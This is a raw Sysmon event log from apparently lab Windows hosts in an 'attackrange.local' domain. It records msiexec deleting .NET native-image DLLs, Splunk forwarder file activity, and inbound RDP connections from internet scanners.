14:56:31.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OXYH1ETAXY\System.Core.ni.dll.auxMD5=5DCD12C73B9F94AD86DD5CCFF0961B76,SHA256=F48412CADA48829BCA494224CE73B46166853194748E6A93117C35D3A388A473,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OXYH1ETAXY\System.Core.ni.dllMD5=0AA216B359BB985E91C06D6CEC347EF2,SHA256=5EDE9B67C3A3A41FCC240B0D7F27764343BD8C1BB1EAC39F441E00C6E5066C92,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.781{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OOS41VYSH3\System.DirectoryServices.ni.dll.auxMD5=5BE283A9E68591B32773566F147A211F,SHA256=83CFFD1BAEA158353574578F2145C054F207526C8E544F114652C4EF01713BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.781{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OOS41VYSH3\System.DirectoryServices.ni.dllMD5=8CE05080E8212D45575DB5EC52382363,SHA256=B2960982ADB25974561E8356470B1234CDEC00F5FDBAFDC39F221B37F914433E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OFVXZGR1VK\System.ni.dll.auxMD5=F5E454AFEA99BF074A1D3313654C9C7C,SHA256=15FFAD8EC46C0265F01EE5C5891650A8C1D7D481080057D01EC1F0B597D009F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.719{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OFVXZGR1VK\System.ni.dllMD5=D60796FB70D97A574714D0C77F93D97D,SHA256=A1C4314F753DA4EE230B0AB995A4F9EC872F35780174F6E060A1DF56EBBBD6EF,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:30.184{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54116-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.453{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE96E7753F433218D1A4D18F16E1BE18,SHA256=8C5B03DF9A05734870B64EC19F5766172D40923C95A8056A6E00FFC3BEB6C708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OD8WEIQHVA\System.Transactions.ni.dll.auxMD5=799D1D6903AEF7B551CD4A4C6B265AA9,SHA256=EAE828D0DC70B8C0CADC0F2FB1EB4DAB7A5E36C371C4B8A27C807DE7C0974339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\OD8WEIQHVA\System.Transactions.ni.dllMD5=8D18FAAB7987602078CF848438C95F88,SHA256=AB760B68DE4E3D55C85FBC48423AC7C47C8A8C34FC3964E0473DA960D0BC3C5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\O8XCWSNQV8\System.Core.ni.dll.auxMD5=EB3705BF415BBFABE3EEF435BB9CAADD,SHA256=19E4BFB51F3918297F82E34403F9F1935B17BBC2A78E6C4247D6089C94C8BF15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\O8XCWSNQV8\System.Core.ni.dllMD5=D34A762C6315A7E500BD3DC88FEDD43D,SHA256=80E62A15C9EB0FAB896B1D0A216D1C3AB4C103B8F957DB46C14E6DD9614D43FC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.219{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=733E43783D073C3EF2B2FAEB14240B1A,SHA256=FD67884DE0AD925F4DDFE067F53478136A9CEC428356FC8D7C21DA8BC4066F5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NYU4M9NQO7\System.Drawing.ni.dll.auxMD5=AE1806558A5233CA0895E229CA9A5CDD,SHA256=BF8A1C5F9A51673F43C265FD747004440EA4B3BC1CE92378D2A9C6B197995F1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NYU4M9NQO7\System.Drawing.ni.dllMD5=FDBA63CB8F1C68D60D66AC4C25A52A2D,SHA256=9DFCA47793FC5BA5B8158ABB6E3487263E7967F0CD4533083D465AB38EA2018C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NVJRBVWD7A\System.Core.ni.dll.auxMD5=48FFD457B52D2283A43AAA2D8D7B2895,SHA256=529CDC113FC10D5542623FECA65BED08EF6A85D46AD9F372D32D25C91224FB54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\NVJRBVWD7A\System.Core.ni.dllMD5=783B07F6DC4FEB9350CE7157E6240EA5,SHA256=A3CDC262830D14397834BF31D00E6F5179BFA6B9E570BD76C623E6033A0FF60D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000050028Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:31.297{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFADE029E37AD6105BE4B1005C557F9C,SHA256=2FADC3BA719E446A944BFD40845CD577F62EC2702B73E545F8758DDD721DA95F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Q2MFXXO1IW\System.Web.ni.dll.auxMD5=83B0819F19853C14765B24B1AD811ABC,SHA256=24231188EFF9EBADA282616086E59934ECD0A180EACC8CBA3A623AE1026052BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.984{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\Q2MFXXO1IW\System.Web.ni.dllMD5=5AD420742C2665182250F7D95FF74A76,SHA256=7A8D4B30B8FF51570A614F387F29715B80B2BBC4C7BB4213062AD17DDA698C4A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PYJA7OW6LL\System.Transactions.ni.dll.auxMD5=67EA7579FBE5D95C014B695402882EE0,SHA256=02A0F13F1E4E2882F3F1298FD9F09EDC0DF787CB503D2929A7536ABCE64D90FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PYJA7OW6LL\System.Transactions.ni.dllMD5=0111D3A2E533281DC6DD7C981CB8CAA1,SHA256=600DE357800878318E9B1C166BF9402EACA737CADBAB9ADCB7FDF8BBA6C67030,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.352{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58762-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PL1HU7TT90\System.Numerics.ni.dll.auxMD5=D4AF447AE12A5806CB93B8D78E283140,SHA256=09DBF9D69C0FA8722ED60CCB128241D63E23DBAAC1AC0C3406136024ECC0EEC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PL1HU7TT90\System.Numerics.ni.dllMD5=5FF3E0606A26FD5CED8795E64BD23991,SHA256=3100FEDE83BB1EF84518D4DDF9344F0FA72E1797C5934D4BDC3C0473463C8693,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PG3AN2E5Y1\PresentationFramework.ni.dll.auxMD5=1CD640D915EAE872FC60479FB1991D49,SHA256=4136E63F0E092B2DB0DB99F29185481D5F9CF9273FB96BB33273FC4B8F077704,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.609{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PG3AN2E5Y1\PresentationFramework.ni.dllMD5=F4BE31FD7508880EBE11971999150E20,SHA256=67784892A02B103C517FFBCEB07F743E14E727539AADA82138342FEAECD1C8C9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.469{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C74D665A18AE726566EF51EE2413613,SHA256=83DE5158AC2660849C6C001628328BADE08451C62679C6C992A8370994268372,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PC4QJUM510\System.Numerics.ni.dll.auxMD5=46C8A979AD3266DDEF725C7E593B0EC9,SHA256=44F41AE20DFD28ABE6EE0E04898C519AD9709FA50D948409B2ECD81BB20D3D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.250{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\PC4QJUM510\System.Numerics.ni.dllMD5=63A9B260BCFCC94E75F0B012DE2B32EF,SHA256=3BFD410197EBDCE1914F9CA077D5B2BE75A664A54D5D9B05169694327EC86CE3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.234{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=558249E6BB0A1E35AACE7CE76AD9575F,SHA256=987FC55A468DB35B471542AE4A33B7575C35114E8AABD6CFB74C6B4678BEA174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.234{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=F59B207B2604A8788D50F1191837C76E,SHA256=F6D049D65F72F79CBA2AF77E3806F485BB13A7B4DAD40D16B8EDE23B93631312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P5RBFV7DTM\System.Management.ni.dll.auxMD5=9E113C3F173739443B36B19DD5C6669B,SHA256=E6D1A62EA7C191912AA011D805E8000EE89FE7281E888EF7A398F4FBA9AC4182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.203{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P5RBFV7DTM\System.Management.ni.dllMD5=545B093E8C7408982436090E8E13BA3C,SHA256=CFFD545D318D02B523B06E28AFD09A3649D013965B45986CFCAEE54A07AF0C1A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.187{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P3LFTWOA7M\System.Core.ni.dll.auxMD5=0B7B3547A6755335583D2C975D27717F,SHA256=CB5ECB0625E0E2D5C2A864279FFAFC96048F0E10B0A47437B6CA6D8FA2DAE6E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.187{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P3LFTWOA7M\System.Core.ni.dllMD5=90F0732AF7D2F9207DEA5BD7ECAD33B0,SHA256=C929FD867AE7413965067562351E1DFA8D05721D5A6151A3B575EB94B970F923,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P1WYFUDXSN\System.Security.ni.dll.auxMD5=74E5478F4A51B682700233CD6B7C05DC,SHA256=4BC93A21F6F5BE0B8E4ACFB6F96A6F3B1444A8310826E2CCC4DD8862E4D6F3E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.016{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P1WYFUDXSN\System.Security.ni.dllMD5=D518D6481A2B6037B8E61101718E6EB3,SHA256=154839515F16941BB2AB2FF9716A5CBCA5FECCD9CEAF9D0D51BA9797F3B98721,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P0RK1OW14J\System.Configuration.ni.dll.auxMD5=F07B09293E0492E71E96C7A764BB524D,SHA256=A24285135DCD60675A12C5E36DF5B3FD7AEEEACFD305973C262A0C73053C7703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:32.000{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\P0RK1OW14J\System.Configuration.ni.dllMD5=B0386808CBC978446F0D8638C53F9F02,SHA256=7E05166D981CF6FA3157EE088305E2B901B9721FCED6370E9D1CE7511A71AC64,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050032Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:30.667{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56867-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050031Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:30.560{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58040-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050030Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:32.297{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A4A715781908E48B4FB4A2C1EDB732,SHA256=0D57463B28FFE608AD4D4C95FF0C814A5620027342D3CB46C9444A15F1B9A586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050029Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:32.281{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84673E8ACA0AF2D6EF16DD1A5D9E2C45,SHA256=7EEC01E1F4010AE933F1F132441FF4F80CA7D354174EBCB1FC6AA80C3C79F670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RFANI0AIQZ\System.ni.dll.auxMD5=9651A4D69D091A91F7509B493895084C,SHA256=7F97FFC6DBCF14DEF386747D99B2204F6C0BE9C123F585888BF0BC23B424155B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.953{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\RFANI0AIQZ\System.ni.dllMD5=0D511A145E1BEFBF8048E4958B18EF8C,SHA256=5B4E622B50F3659A09BC10F7047FB5AECD568565E358232DBD8B85B615F42FB0,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000073091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:31.629{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36958-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QXUP2CX6WS\System.ni.dll.auxMD5=0ABA8EE4C96771CD3B6CD56A2DA9CBF6,SHA256=9C26CAC4A3E0C19DF4928C90F5F36A2D5AA689905B7AF3E9A7CBA5B925753D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QXUP2CX6WS\System.ni.dllMD5=FC806E761F72F4A41798B08766D9DB13,SHA256=1B6FB65CE6BCF66CE1BFC0BE58F06DD2949012D03BF79CE67EB35A20A5460839,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.562{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED64B6F0D12FC6FF836BD95B1A917489,SHA256=98592A0BAF35F98A35A399D51B08D5C6B4C241A5A29A4FD86C8AA02A65C4F63C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.484{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B45E045B00BBD7A61CEE0966E498C6E,SHA256=A9458ECA1967FB3E92DD76E3EA768709A50CD54F194E19A1BC4D4AAB15464C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QXL4YWDM1H\System.ServiceProcess.ni.dll.auxMD5=FB48CBD15429C7B1F9A14E82CDF8B24D,SHA256=E11D297738EB6EFD68E74B919FC25F124C6CC4AE3E1C7595BB224BF4567C30FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QXL4YWDM1H\System.ServiceProcess.ni.dllMD5=52E1C1642839FB780CD29C337867C549,SHA256=5823F6CC6549B5FE1FDFF03DCF1B95DFAFDE9D381C04D3C8F5BDCC636A053E54,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QSGIT28P8A\System.Xml.ni.dll.auxMD5=6A7FCA88EB093FE1BB082E272AC2421D,SHA256=A5950FA568159B35AA8963997DB039E0CCBABC8668001E24B0E8E7B05467B0DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.406{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QSGIT28P8A\System.Xml.ni.dllMD5=D2D51896FC97FC53362B468BA49EEE3A,SHA256=D42A3DE02488863E75FAED49C251D958F8C26CC2F523ACA01D0F0CAC4052F78C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000073082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.406{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=558249E6BB0A1E35AACE7CE76AD9575F,SHA256=987FC55A468DB35B471542AE4A33B7575C35114E8AABD6CFB74C6B4678BEA174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\QGHMUB8IBD\System.ni.dll.auxMD5=4C4FFFC3E154C905C9C643845FCE328A,SHA256=1F43D99B3935FB07CC6C6340C832C92C43495F06826C07A01FEBF4BF1E97336B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:33.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT 